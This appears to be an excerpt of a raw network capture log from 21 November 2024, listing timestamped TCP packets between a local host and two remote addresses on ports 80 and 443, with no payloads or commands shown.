                                                                                                                                                                                                            Nov 21, 2024 15:17:37.477193117 CET49784443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.477222919 CET4434978413.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.477644920 CET49784443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.477653027 CET4434978413.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.483818054 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.483855009 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.484076977 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.484111071 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.484177113 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.484528065 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.484829903 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.484980106 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.485110998 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.485618114 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.485749960 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.486063004 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.509721994 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.509809971 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.509871006 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.509892941 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.509907961 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.509943008 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.509978056 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.509985924 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.510025978 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.510030985 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.510066986 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.510124922 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.510164022 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.510195017 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.510230064 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.510234118 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.510265112 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.510317087 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.510354996 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.510373116 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.510413885 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.510432959 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.510492086 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.510526896 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.510560989 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.510571957 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.510593891 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.510606050 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.510646105 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.510679960 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.510718107 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.510730982 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.510766029 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.510770082 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.510802031 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.510834932 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.510869026 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.510871887 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.510902882 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.510905027 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.510936975 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.510989904 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.511023045 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.511029005 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.511059046 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.511105061 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.511138916 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.511173010 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.511204958 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.511210918 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.511239052 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.511241913 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.511274099 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.511307001 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.511348009 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.511359930 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.511394978 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.511399031 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.511455059 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.511490107 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.511523008 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.511532068 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.511555910 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.511564016 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.511593103 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.511636019 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.511668921 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.511676073 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.511703014 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.511717081 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.511738062 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.511771917 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.511804104 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.511815071 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.511840105 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.511845112 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.511873960 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.511907101 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.511940956 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.511945963 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.511971951 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.511981010 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.511987925 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.512005091 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.512021065 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.512037039 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.512037992 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.512052059 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.512063026 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.512067080 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.512082100 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.512089968 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.512098074 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.512113094 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.512116909 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.512130022 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.512145996 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.512154102 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.512178898 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.512329102 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.513056993 CET4434978513.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.513791084 CET49785443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.513808966 CET4434978513.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.514317989 CET49785443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.514324903 CET4434978513.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.517213106 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.517302990 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.517318964 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.517358065 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.517376900 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.517421961 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.517438889 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.517442942 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.517457008 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.517493963 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.517519951 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.517534971 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.517549992 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.517565966 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.517573118 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.517591953 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.517596960 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.517608881 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.517630100 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.517641068 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.517656088 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.517671108 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.517683029 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.517685890 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.517704964 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.517710924 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.517746925 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.517749071 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.517764091 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.517779112 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.517816067 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.517827034 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.517843962 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.517859936 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.517862082 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.518094063 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.518759966 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.518795013 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.518810987 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.518848896 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.518981934 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.519015074 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.519017935 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.519037008 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.519721985 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.519737005 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.519752026 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.519768000 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.519805908 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.694153070 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.694220066 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.694268942 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.694314957 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.694469929 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.694497108 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.694535017 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.695132017 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.695178986 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.695207119 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.695220947 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.695907116 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.695957899 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.695987940 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.696013927 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.696024895 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.696813107 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.696867943 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.696890116 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.696921110 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.696948051 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.697585106 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.697829962 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.697846889 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.697886944 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.698435068 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.698494911 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.698510885 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.698539972 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.698558092 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.699434042 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.699594975 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.699610949 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.699646950 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.703212976 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.703229904 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.703269005 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.703273058 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.703284979 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.703299999 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.703322887 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.703325987 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.703341961 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.703355074 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.703356028 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.703372002 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.703372955 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.703386068 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.703402996 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.703408003 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.703418970 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.703434944 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.703728914 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.703769922 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.703850031 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.703869104 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.704513073 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.704559088 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.704603910 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.704619884 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.704643965 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.705385923 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.705437899 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.705465078 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.705481052 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.705524921 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.706245899 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.706337929 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.706363916 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.706393957 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.707117081 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.707165003 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.707181931 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.707197905 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.708060026 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.708101034 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.708142996 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.708157063 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.708184004 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.708834887 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.708894968 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.708904028 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.708919048 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.709425926 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.709738970 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.709834099 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.709850073 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.709888935 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.710716009 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.710742950 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.710757971 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.710762024 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.710796118 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.711450100 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.711517096 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.711532116 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.711575985 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.712289095 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.712346077 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.712357044 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.712361097 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.712394953 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.713149071 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.713227987 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.713242054 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.713306904 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.714090109 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.714104891 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.714121103 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.714148045 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.714183092 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.714884043 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.714962959 CET8049778185.215.113.16192.168.2.6
